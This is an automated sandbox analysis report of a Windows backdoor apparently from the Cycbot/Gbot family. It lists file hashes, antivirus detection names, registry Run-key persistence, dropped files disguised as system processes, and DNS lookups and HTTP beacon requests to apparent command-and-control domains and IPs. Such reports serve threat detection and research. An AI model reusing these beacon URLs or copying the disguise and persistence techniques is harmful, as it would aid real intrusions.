Analysis Date: 2015-05-06 22:04:20
MD5: 28830997689e179c7986751388a48eca
SHA1: 792a8f8814d93d68c8d9da592e0e52b17a56bc2a

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: df9c7ce8c21307bce4e7f4391838287d sha1: 59cc710317030d1f64cc4aff94828941e64e2984 size: 115200
Section .rdata md5: 9d1a4e0207520d1702b5257a9403d1a1 sha1: 765b9fe0226f3e78cdc220defc1e0a21b52fa892 size: 1536
Section .data md5: 82de2a5dd53d40c68ebf694b1072b2b8 sha1: b2ab08054c534c2d0f72cf26b30c715f5ebbb6e6 size: 66560
Section .reloc md5: 04cf75f76c194f4745ed536dc48a66f5 sha1: bfd9ca5d08059d3bc7d199203de610adc51debbe size: 1024
Timestamp: 2005-09-06 08:29:55
PEhash: 8a88ad475eb9a6a1adebdbc7151ba7f4e7e3b7fe
IMPhash: ac0aacff876467a77465f0178196b8cc
AV Ad-Aware: Gen:Variant.Kazy.38355
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): Gen:Variant.Kazy.38355
AV Authentium: W32/Goolbot.M.gen!Eldorado
AV Avira (antivir): TR/Crypt.ZPACK.Gen
AV BitDefender: Gen:Variant.Kazy.38355
AV BullGuard: Gen:Variant.Kazy.38355
AV CA (E-Trust Ino): Win32/Cycbot.G!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: no_virus
AV Dr. Web: BackDoor.Gbot.73
AV Emsisoft: Gen:Variant.Kazy.38355
AV Eset (nod32): Win32/Kryptik.TNG
AV Fortinet: W32/Jorik_Gbot.EBE!tr
AV Frisk (f-prot): W32/Goolbot.M.gen!Eldorado
AV F-Secure: Gen:Variant.Kazy.38355
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Virus.Win32.Cryptor
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Backdoor.Bot
AV Mcafee: BackDoor-EXI.gen.r
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.B
AV MicroWorld (escan): Gen:Variant.Kazy.38355
AV Padvish: no_virus
AV Rising: no_virus
AV Sophos: Mal/Agent-AEO
AV Symantec: Backdoor.Cycbot!gen7
AV Trend Micro: BKDR_CYCBOT.SME3
AV Twister: Backdoor.B9EE38EA15B088BE
AV VirusBlokAda (vba32): Backdoor.Gbot

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {6988405C-71C3-427c-975A-0398706E79EE}
Winsock DNS: resetmymemory.com
Winsock DNS: 127.0.0.1
Winsock DNS: fastblogportal.com
Winsock DNS: nationsautoelectric.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNS: nationsautoelectric.com
Type: A
98.139.135.198
DNS: zonedg.com
Type: A
141.8.225.80
DNS: zonedg.com
Type: A
141.8.225.80
DNS: resetmymemory.com
Type: A
192.155.89.148
DNS: worldmotoblo.com
Type: A
DNS: fastblogportal.com
Type: A
HTTP GET: http://nationsautoelectric.com/images/50-217-1_F_2_.jpg?v93=83&tq=gJ4WK%2FSUh7TFhRMw9YLJuMSTUivqg4a0xZNTK%2B%2FbxWq1SfkIYUBM
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP GET: http://resetmymemory.com/blog/images/3521.jpg?v61=97&tq=gKZEtzyMv5rJqxG1J42pzMffBvwr1%2BjbwvgS917W65rJqlLfgPiWW1cg
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8CiYvEaSvT%2Bsqpi8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 98.139.135.198:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 192.155.89.148:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1038 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1039 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1040 ➝ 141.8.225.80:80

Raw Pcap

Strings